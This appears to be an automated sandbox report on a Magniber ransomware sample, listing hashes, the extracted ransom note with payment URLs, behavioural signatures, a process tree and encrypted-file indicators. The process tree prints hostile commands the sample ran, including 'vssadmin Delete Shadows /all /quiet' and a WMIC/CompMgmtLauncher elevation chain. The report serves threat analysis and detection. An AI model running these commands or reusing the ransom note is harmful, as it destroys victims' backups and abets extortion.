Overview

overview

10

Static

static

8

1814a6a674...67.exe

windows7_x64

3

1814a6a674...67.exe

windows10_x64

10

2ca4f97e15...51.exe

windows7_x64

10

2ca4f97e15...51.exe

windows10_x64

10

3db6e8df73...3b.dll

windows7_x64

10

3db6e8df73...3b.dll

windows10_x64

10

3e2ce6fd7b...a5.exe

windows7_x64

10

3e2ce6fd7b...a5.exe

windows10_x64

10

463b34821a...40.exe

windows7_x64

10

463b34821a...40.exe

windows10_x64

3

4f4a33f700...72.exe

windows7_x64

10

4f4a33f700...72.exe

windows10_x64

8

53b1c1b2f4...22.exe

windows7_x64

10

53b1c1b2f4...22.exe

windows10_x64

10

62b2822215...d3.exe

windows7_x64

9

62b2822215...d3.exe

windows10_x64

9

6bc6f60b87...bc.dll

windows7_x64

10

6bc6f60b87...bc.dll

windows10_x64

10

6f7043b24d...1d.dll

windows7_x64

1

6f7043b24d...1d.dll

windows10_x64

3

706a8a4fc4...1c.exe

windows7_x64

10

706a8a4fc4...1c.exe

windows10_x64

10

7236c8098c...8e.exe

windows7_x64

10

7236c8098c...8e.exe

windows10_x64

10

74ebfcd116...dd.dll

windows7_x64

10

74ebfcd116...dd.dll

windows10_x64

10

7fbeac1dca...de.exe

windows7_x64

10

7fbeac1dca...de.exe

windows10_x64

10

87e6f7b20e...89.exe

windows7_x64

3

87e6f7b20e...89.exe

windows10_x64

3

918127c59e...3d.exe

windows7_x64

10

918127c59e...3d.exe

windows10_x64

10

Analysis

  • max time kernel
    135s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    24-09-2021 10:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe

  • Size

    125KB

  • MD5

    f9bf85cfb68d9e5f68bbccaf683af15c

  • SHA1

    a2eae8c1350fcfa429d2af664d8320edbfabe5d3

  • SHA256

    463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40

  • SHA512

    07032679f19bba5690b59a6b689859d0b3611995cca6f990d2eee4b2f586493b29e70b4525e057abefe79a86695fa934f52e175a12098e0eeef7c1e3d049066a

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://f26c5ab89af4da80faqwfekni.n5fnrf4l7bdjhelx.onion/qwfekni Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://f26c5ab89af4da80faqwfekni.perages.cyou/qwfekni http://f26c5ab89af4da80faqwfekni.aimdrop.fit/qwfekni http://f26c5ab89af4da80faqwfekni.soblack.xyz/qwfekni http://f26c5ab89af4da80faqwfekni.sixsees.club/qwfekni Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://f26c5ab89af4da80faqwfekni.n5fnrf4l7bdjhelx.onion/qwfekni

http://f26c5ab89af4da80faqwfekni.perages.cyou/qwfekni

http://f26c5ab89af4da80faqwfekni.aimdrop.fit/qwfekni

http://f26c5ab89af4da80faqwfekni.soblack.xyz/qwfekni

http://f26c5ab89af4da80faqwfekni.sixsees.club/qwfekni

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 14 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 5 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1344
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1740
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://f26c5ab89af4da80faqwfekni.perages.cyou/qwfekni^&1^&46782124^&88^&339^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1460
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://f26c5ab89af4da80faqwfekni.perages.cyou/qwfekni&1&46782124&88&339&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:956
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:956 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1896
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1912
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:1400
    • C:\Users\Admin\AppData\Local\Temp\463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe
      "C:\Users\Admin\AppData\Local\Temp\463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:1720
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1612
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            4⤵
              PID:1620
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1496
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1908
      • C:\Windows\system32\taskhost.exe
        "taskhost.exe"
        1⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1260
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1676
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:976
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1600
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:1068
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:1780
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
              PID:1212
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:1316
            • C:\Windows\system32\cmd.exe
              cmd /c CompMgmtLauncher.exe
              1⤵
              • Process spawned unexpected child process
              • Suspicious use of WriteProcessMemory
              PID:2040
              • C:\Windows\system32\CompMgmtLauncher.exe
                CompMgmtLauncher.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1920
                • C:\Windows\system32\wbem\wmic.exe
                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                  3⤵
                    PID:1596
              • C:\Windows\system32\cmd.exe
                cmd /c CompMgmtLauncher.exe
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:1172
                • C:\Windows\system32\CompMgmtLauncher.exe
                  CompMgmtLauncher.exe
                  2⤵
                    PID:1464
                    • C:\Windows\system32\wbem\wmic.exe
                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                      3⤵
                        PID:1544
                  • C:\Windows\system32\cmd.exe
                    cmd /c CompMgmtLauncher.exe
                    1⤵
                    • Process spawned unexpected child process
                    • Suspicious use of WriteProcessMemory
                    PID:2016
                    • C:\Windows\system32\CompMgmtLauncher.exe
                      CompMgmtLauncher.exe
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:752
                      • C:\Windows\system32\wbem\wmic.exe
                        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                        3⤵
                          PID:1760
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:1612
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:1080
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:1692
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:2044
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:1908
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                        PID:1516

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Initial Access

                      Execution

                      Persistence

                      Privilege Escalation

                      Defense Evasion

                      File Deletion

                      2
                      T1107

                      Modify Registry

                      1
                      T1112

                      Credential Access

                      Discovery

                      System Information Discovery

                      1
                      T1082

                      Lateral Movement

                      Collection

                      Exfiltration

                      Command and Control

                      Impact

                      Inhibit System Recovery

                      2
                      T1490

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\SOVCWR0E.txt
                        MD5

                        67693900a9040483c1a4c256e8fa65ac

                        SHA1

                        fa37508e4a9d3921a3e28e635ead68ef198ddbcf

                        SHA256

                        1bbe435a1840f6377554259d12471872e5a13cb4f10c1a71612ecf4cd01d516f

                        SHA512

                        1368cb2b6d3c59a1c4ecd0249db0e8d49b7ee21b8c4dd36a695988cd0cd781d06050ec34a24abcbd2ce5d1e549aaa51948e09125c1c69b4568ee6ef2e29aa698

                        Download Submit
                      • C:\Users\Admin\Desktop\AddShow.nfo.qwfekni
                        MD5

                        5ef13d83fe70588d9cb199cbd56e98e3

                        SHA1

                        0b33903e779657cdc0acf767a9a5d0a366e1a49d

                        SHA256

                        1f49b3853b075842038a158d8511f300dc920a9cfb216a5198b7e55f7c0e756a

                        SHA512

                        514dcb04c2b5081320a00c67195fbf1d0787414a8a7e082c1c1e80a362ee4cfe787d8bb7e1521e32b534e4fb298c55ddb9b857057c59e2695dd81c141a44752e

                        Download Submit
                      • C:\Users\Admin\Desktop\ApprovePing.docm.qwfekni
                        MD5

                        b98ad1efdc7ae84f6779fbc3d75cab6d

                        SHA1

                        f634a91051b03ab49c6580d59537b26b3115325f

                        SHA256

                        78573187fc5b68e279591aa60ec52ff968e80ed3373cb1cb599e107d1497eb8d

                        SHA512

                        65bb6b02ef4a278bc30fe22bac4fcd2e1570287c4a05159c963ecae774d4159e2c9c9a7308c0a91aac5c33e8c40444cf6b101030714c50af84d4cf52dafebba8

                        Download Submit
                      • C:\Users\Admin\Desktop\BackupUpdate.dib.qwfekni
                        MD5

                        458b216b7bcd714f16be20e413ac688b

                        SHA1

                        f60675988755c81c8fc3e514f0be024db9b3cd8f

                        SHA256

                        331bbe73431ebe47030316c05cd32d293f5d35a3b83608ea9ffd99dffa6afd5c

                        SHA512

                        47474c8b87687a7e4520ac534c685774f9c1f7045ddf4e91d509e1c3d2520ce3aca85974894a546fa8a6e6f0f134721bc2f2d4c6187434d940ff70cb8a64574a

                        Download Submit
                      • C:\Users\Admin\Desktop\BlockBackup.bmp.qwfekni
                        MD5

                        1195a0a3a146013578214e7169099bc5

                        SHA1

                        4f9fd6a5e81ce75734167f1680ddb2492da30798

                        SHA256

                        74036fd00521254c8a69969bc2c4f9309a2842f6db8921c0c6ca1f21fc2d95e9

                        SHA512

                        f71c464d8c70d25ae8abd3fd15089d0fe7e97c9c8a05c7c04796f15237b178736c3043a2d4dd7b11a6283fc628fe48b57faae1966b49743c3f6af98abb475acd

                        Download Submit
                      • C:\Users\Admin\Desktop\CloseUnregister.xlsx.qwfekni
                        MD5

                        dd9a280549de1f15d414dd3c6786bb98

                        SHA1

                        bda78003b4c4b9e2f2dcfddb9a41b75829f88526

                        SHA256

                        ca8635d3669751c7a13a69c4d6a3b8dfbfa262c51af3fdb800247fa6e1719e90

                        SHA512

                        329a63a7f4869923a0e9c4516cc4db12c7ff2b2a24e6cc8f168850f6523faea8829f5abd12a4ed05175635b752a511be50a190b31c20c46bb82d33362dca338f

                        Download Submit
                      • C:\Users\Admin\Desktop\CopyDisable.odt.qwfekni
                        MD5

                        06fcaea79a8ede94bed48c99fc28ebcb

                        SHA1

                        7529ca6d01541471752fd15c382c2f0241d58190

                        SHA256

                        615136bbe7b33d53aab61924d8923df8da42d0a794cdcea767633b4e3c341fcd

                        SHA512

                        e206982db0915530bf0b3049ae7fcdfc86f582fcb9026cd1c75a1e395902273cd88b8bed9fd964f2a6d47a3601de27ff4c71378f77bc9a0ad14f8b2a976fa5ed

                        Download Submit
                      • C:\Users\Admin\Desktop\DismountTest.mpg.qwfekni
                        MD5

                        e4e23f6c575d2dd517914f9bfc2977ff

                        SHA1

                        74aaba806623662d1845baa93a6e092d6d2a1d59

                        SHA256

                        8f6146ca1b3d95d6c5dc342748969b73d91e178a25ae717ab8babc1f897b386a

                        SHA512

                        37866d6f44895fb8e6ce42e315701076cc3335e2c7ca9520a862fd92a10d9a37df79cfa3c6897c58132749dad60703287bbd4d20bd2b85c27aeecb653e162a1e

                        Download Submit
                      • C:\Users\Admin\Desktop\EditMove.avi.qwfekni
                        MD5

                        a948fb3cbf4cfe39eef053ad1ec9eea8

                        SHA1

                        a35b83054201a41fd847e904fb6fd2be1ee6204d

                        SHA256

                        fec0a5624971502be75ef7b48bdaf7319c07985fffc46a2ac03c5ef690d6ea81

                        SHA512

                        018235df1f9b55fbb6406db45f5508208c5b2036ec06de450260c1d5c678f1e5814a5c91a5c0afa3792e95eef1f1a6e79eb636b7946a035fb8e85022ca61f0f5

                        Download Submit
                      • C:\Users\Admin\Desktop\EnterBackup.tif.qwfekni
                        MD5

                        8807bcb34185c0ef9b1c65de4b7af76b

                        SHA1

                        a345e657dd5cab1508c79df1b1b2223d911285a6

                        SHA256

                        6ea47f313fbae99916f656177b494cb824bcaa3038a92d038e0e0ab4f4028f85

                        SHA512

                        1c36553e10609d147373efbfde182b9d4530540b886026dd7231823d95faacc22e237b7589c9b56ff39321b21a1d3a333986b68b9af53e1108e800682eac6a16

                        Download Submit
                      • C:\Users\Admin\Desktop\ExitUnregister.png.qwfekni
                        MD5

                        bb2204b485e129448fb2787b6006dce8

                        SHA1

                        eaa495ff7488dff10f7b12f95eb5d08359ebc2d8

                        SHA256

                        a91398982b995ec779926742a15bd932693bd521688b940c9e0ebafd50f9851f

                        SHA512

                        062c836ef5c0f577135cd1c7fe9571ea880e26a69cff15084ec2cadaece494a27192fce9ae5786f6145ecc1487e94ffe656a3cec8c0513ae8316fd6b5f137322

                        Download Submit
                      • C:\Users\Admin\Desktop\GetWait.pps.qwfekni
                        MD5

                        f3021ff19265479ea61953e84dc7a90a

                        SHA1

                        853c824ed83265bffa50df5d696fb886c5056635

                        SHA256

                        1e22a30de31a1b02be8eed4eefe8a6ca7d9324c6052ed90a3a2977c86c994dbe

                        SHA512

                        d8e3a3aece6b7636d35f1017469c791bf55067445d964ea5d9906db1b1dba0fe158f67573c078ac707817789066ec4e0422ce0fe072d0596b37e28534dba0774

                        Download Submit
                      • C:\Users\Admin\Desktop\NewDisconnect.emf.qwfekni
                        MD5

                        94cb8ce69432f4b949a2057caf9e62c2

                        SHA1

                        445f3983dc850992d392008a862b5202be26a23c

                        SHA256

                        42c46d9fa9a7ec68a8ae6d256774fd6614d7ecb39c2d723bc95d91994a03158a

                        SHA512

                        5b8411ce54f3eedb0cae24ade204469ad8fad6dc24d25a31c40daa3243f1a1375ae234e9c8ea14dc82a769cdf4b32072e743485c950c29d29789594383fbdd8c

                        Download Submit
                      • C:\Users\Admin\Desktop\RestoreStart.odt.qwfekni
                        MD5

                        3a66bea600b180fbb60b12bb801fe3dd

                        SHA1

                        530e2f34f52f90a20264b183561dd0a81a82ec84

                        SHA256

                        89da93469f6f83506de7f0e16e731a7a42767912942dd37c0f0477376bdc7252

                        SHA512

                        89dba6a20e0636dac240e4fd4382a3477d8c93dec2b8f34c5de3f7cc155319291bf3c9f08415695ac7d471eac30b2835ea5421f20f1e33f648f47eb257ee0648

                        Download Submit
                      • C:\Users\Admin\Desktop\StopSet.bmp.qwfekni
                        MD5

                        591731fa5d55c81800cdb4769ca8c577

                        SHA1

                        1b642ec79a131aa50da04458dcacbc33947965ad

                        SHA256

                        4f330a9562533e5e52dd1e62e7c532a9c5677ff7d3f49d6d2b9c02ba9c85d72c

                        SHA512

                        341878e077594f4a961a70e893b8251e4fce4e0b2cbe25971c50752450ccabd547d4047e092e26afc2c33aa4934981424ef583cde3bcca0a8a9cd47891560f1e

                        Download Submit
                      • C:\Users\Admin\Desktop\UninstallReset.ppsx.qwfekni
                        MD5

                        94e96d6e9a1d501fe6f31af3a0e39f93

                        SHA1

                        874bac9f39b3f0dafc7d7d568ba825ec35a06eda

                        SHA256

                        7314cab48597fd02f36804d371a4fa73b1510089207154ea53d32de8ee38a96d

                        SHA512

                        c08744d86874db91debc21b37168ba6a9495c1223548675798e195c5ba16220bdeb41150cab3ae92ab3d95f69afa157da1b82aef36b820853c63c2daeaa550d5

                        Download Submit
                      • C:\Users\Admin\Desktop\UnpublishApprove.potx.qwfekni
                        MD5

                        828582f1290173560cd83224178670fb

                        SHA1

                        3fa6f33e73c5569280a14bc8b3156198701ed3ba

                        SHA256

                        9e1b09c784fd5d743c951039787e4d7d0842891c51debd397d3c5c0e798ea1c0

                        SHA512

                        09ab5f9e9cca24c6bfc59b5c2f7b9201ca24aba6cd553b2309b0c02c6539876de331b8c6e274ee698e47fb7f782c7b7b6c67261eac6bbd179f8f72f1e15836bf

                        Download Submit
                      • C:\Users\Admin\Desktop\readme.txt
                        MD5

                        0e224300ba4e4418c3e72f1ab7903a76

                        SHA1

                        5c8fadee998eda534dda8d37b24d36e2ce1b37b6

                        SHA256

                        6417cf02c259603e74640c6535bfeaad1d0b15880141c8a4937f464fb13b089f

                        SHA512

                        9e3d196f0af407b4634ee42b623eee940ab68affc2cf3cc8032d788d6e7b1f267df106b28c888b2ffdb48344fc65f441c3afb7b4dd0168591795499f30c4e5ba

                        Download Submit
                      • C:\Users\Admin\Desktop\readme.txt
                        MD5

                        0e224300ba4e4418c3e72f1ab7903a76

                        SHA1

                        5c8fadee998eda534dda8d37b24d36e2ce1b37b6

                        SHA256

                        6417cf02c259603e74640c6535bfeaad1d0b15880141c8a4937f464fb13b089f

                        SHA512

                        9e3d196f0af407b4634ee42b623eee940ab68affc2cf3cc8032d788d6e7b1f267df106b28c888b2ffdb48344fc65f441c3afb7b4dd0168591795499f30c4e5ba

                        Download Submit
                      • C:\Users\Public\readme.txt
                        MD5

                        0e224300ba4e4418c3e72f1ab7903a76

                        SHA1

                        5c8fadee998eda534dda8d37b24d36e2ce1b37b6

                        SHA256

                        6417cf02c259603e74640c6535bfeaad1d0b15880141c8a4937f464fb13b089f

                        SHA512

                        9e3d196f0af407b4634ee42b623eee940ab68affc2cf3cc8032d788d6e7b1f267df106b28c888b2ffdb48344fc65f441c3afb7b4dd0168591795499f30c4e5ba

                        Download Submit
                      • memory/752-103-0x0000000000000000-mapping.dmp
                        Download
                      • memory/832-64-0x0000000001FF0000-0x0000000001FF1000-memory.dmp
                        Filesize

                        4KB

                        Download
                      • memory/832-61-0x0000000001FA0000-0x0000000001FA1000-memory.dmp
                        Filesize

                        4KB

                        Download
                      • memory/832-62-0x0000000001FD0000-0x0000000001FD1000-memory.dmp
                        Filesize

                        4KB

                        Download
                      • memory/832-54-0x0000000000020000-0x0000000000025000-memory.dmp
                        Filesize

                        20KB

                        Download
                      • memory/832-58-0x0000000000210000-0x0000000000211000-memory.dmp
                        Filesize

                        4KB

                        Download
                      • memory/832-56-0x00000000001F0000-0x00000000001F1000-memory.dmp
                        Filesize

                        4KB

                        Download
                      • memory/832-55-0x00000000001E0000-0x00000000001E1000-memory.dmp
                        Filesize

                        4KB

                        Download
                      • memory/832-63-0x0000000001FE0000-0x0000000001FE1000-memory.dmp
                        Filesize

                        4KB

                        Download
                      • memory/832-57-0x0000000000200000-0x0000000000201000-memory.dmp
                        Filesize

                        4KB

                        Download
                      • memory/832-65-0x0000000002000000-0x0000000002001000-memory.dmp
                        Filesize

                        4KB

                        Download
                      • memory/832-60-0x0000000001F90000-0x0000000001F91000-memory.dmp
                        Filesize

                        4KB

                        Download
                      • memory/832-59-0x0000000001F80000-0x0000000001F81000-memory.dmp
                        Filesize

                        4KB

                        Download
                      • memory/832-100-0x0000000002370000-0x0000000002371000-memory.dmp
                        Filesize

                        4KB

                        Download
                      • memory/956-101-0x0000000000000000-mapping.dmp
                        Download
                      • memory/976-95-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1068-115-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1212-105-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1260-66-0x00000000001A0000-0x00000000001A4000-memory.dmp
                        Filesize

                        16KB

                        Download
                      • memory/1316-117-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1460-88-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1464-102-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1496-90-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1544-116-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1596-114-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1600-106-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1612-98-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1620-99-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1676-94-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1696-96-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1720-97-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1740-78-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1740-79-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp
                        Filesize

                        8KB

                        Download
                      • memory/1760-113-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1896-118-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1896-89-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1908-91-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1912-93-0x0000000000000000-mapping.dmp
                        Download
                      • memory/1920-104-0x0000000000000000-mapping.dmp
                        Download